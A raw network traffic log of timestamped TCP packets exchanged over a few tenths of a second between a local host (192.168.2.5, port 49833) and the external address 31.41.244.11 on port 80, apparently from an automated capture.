Dec 16, 2024 11:03:29.438278913 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.438318968 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.439630985 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.439666986 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.439681053 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.439708948 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.441286087 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.441322088 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.441340923 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.441366911 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.442819118 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.442862034 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.443022966 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.443069935 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.444355965 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.444391966 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.444411039 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.444431067 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.445724010 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.445775986 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.445847988 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.445970058 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.446993113 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.447088003 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.447127104 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.447138071 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.448069096 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.448250055 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.448307037 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.449381113 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.449436903 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.449675083 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.449721098 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.450725079 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.450777054 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.450781107 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.450854063 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.452146053 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.452197075 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.452255011 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.452300072 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.453525066 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.453577995 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.453583002 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.453680992 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.454947948 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.454984903 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.455001116 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.455029011 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.456199884 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.456258059 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.456340075 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.456388950 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.457649946 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.457701921 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.457753897 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.457806110 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.458889008 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.458952904 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.458992004 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.459033966 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.460154057 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.460213900 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.460263968 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.460319996 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.461512089 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.461568117 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.461635113 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.461680889 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.462749958 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.462805986 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.462886095 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.462940931 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.464152098 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.464205980 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.464207888 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.464258909 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.465512037 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.465612888 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.465660095 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.466692924 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.466754913 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.466986895 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.467042923 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.468071938 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.468132019 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.468185902 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.468242884 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.469348907 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.469461918 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.469513893 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.470663071 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.470721006 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.470911980 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.471750021 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.471939087 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.471991062 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.471995115 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.472054005 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.473227024 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.473288059 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.473305941 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.474514961 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.474651098 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.474703074 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.474706888 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.474761963 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.476069927 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.476124048 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.476165056 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.476180077 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.477174997 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.477226973 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.477313042 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.477372885 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.478544950 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.478579998 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.478605986 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.478631020 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.479739904 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.479794979 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.479861975 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.479912996 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.481035948 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.481091022 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.481219053 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.481431007 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.482381105 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.482489109 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.482506037 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.482557058 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.483689070 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.483748913 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.483865023 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.483917952 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.485079050 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.485115051 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.485130072 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.485198021 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.486326933 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.486438990 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.486490965 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.487669945 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.487704992 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.487725973 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.487750053 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.488938093 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.488975048 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.489006042 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.489022017 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.490184069 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.490245104 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.490298033 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.490602970 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.491516113 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.491575003 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.491628885 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.491682053 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.492904902 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.492940903 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.492963076 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.492981911 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.494349003 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.494385004 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.494405031 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.494430065 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.495384932 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.495450020 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.495552063 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.495635986 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.496782064 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.496860981 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.496869087 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.497222900 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.498047113 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.498099089 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.498101950 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.498150110 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.499392986 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.499428034 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.499458075 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.499505043 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.500621080 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.500683069 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.500756025 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.501064062 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.501918077 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.501971006 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.502065897 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.502115011 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.503209114 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.503268957 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.624677896 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.624736071 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.624804020 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.624944925 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.624996901 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.625003099 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.625046015 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.626293898 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.626352072 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.626385927 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.626396894 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.627121925 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.627180099 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.627185106 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.627233982 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.628212929 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.628268957 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.628359079 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.628408909 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.629306078 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.629364014 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.629452944 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.629503965 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.630386114 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.630438089 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.630563974 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.630618095 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.631445885 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.631510973 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.631517887 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.631563902 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.632529020 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.632586956 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.632637024 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.632714987 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.633642912 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.633712053 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.633764982 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.634583950 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.634711981 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.634768009 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.634807110 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.634906054 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.635819912 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.635869980 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.635937929 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.635988951 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.636858940 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.636918068 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.636977911 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.637953043 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.638024092 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.638106108 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.638153076 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.639069080 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.639115095 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.639125109 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.639173031 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.640130997 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.640182972 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.640248060 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.640409946 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.641201973 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.641261101 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.641339064 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.641382933 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.642318010 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.642371893 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.642385006 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.642415047 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.643373013 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.643481970 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.643532038 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.644431114 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.644478083 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.644548893 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.644593000 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.645549059 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.645591974 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.645658016 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.645695925 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.646605968 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.646651983 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.646719933 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.647505999 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.647695065 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.647814989 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.647842884 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.647870064 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.648765087 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.648816109 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.648883104 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.648940086 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.649868011 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.649918079 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.649921894 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.649967909 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.650943041 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.650998116 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.651065111 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.651115894 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.652035952 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.652079105 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.652144909 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.652194977 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.653168917 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.653215885 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.653237104 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.653330088 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.654234886 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.654280901 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.654345989 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.654401064 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.655277014 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.655414104 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.655443907 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.655455112 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.656358957 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.656410933 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.656488895 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.656565905 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.657459021 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.657506943 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.657569885 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.657634974 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.658554077 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.658602953 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.658683062 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.658750057 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.659610033 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.659660101 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.659724951 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.659861088 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.660715103 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.660825968 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.660856962 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.660907030 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.661793947 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.661842108 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.661915064 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.661998034 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.662908077 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.662961006 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.663028002 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.663081884 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.664020061 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.664155006 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.664210081 CET	49833	80	192.168.2.5	31.41.244.11
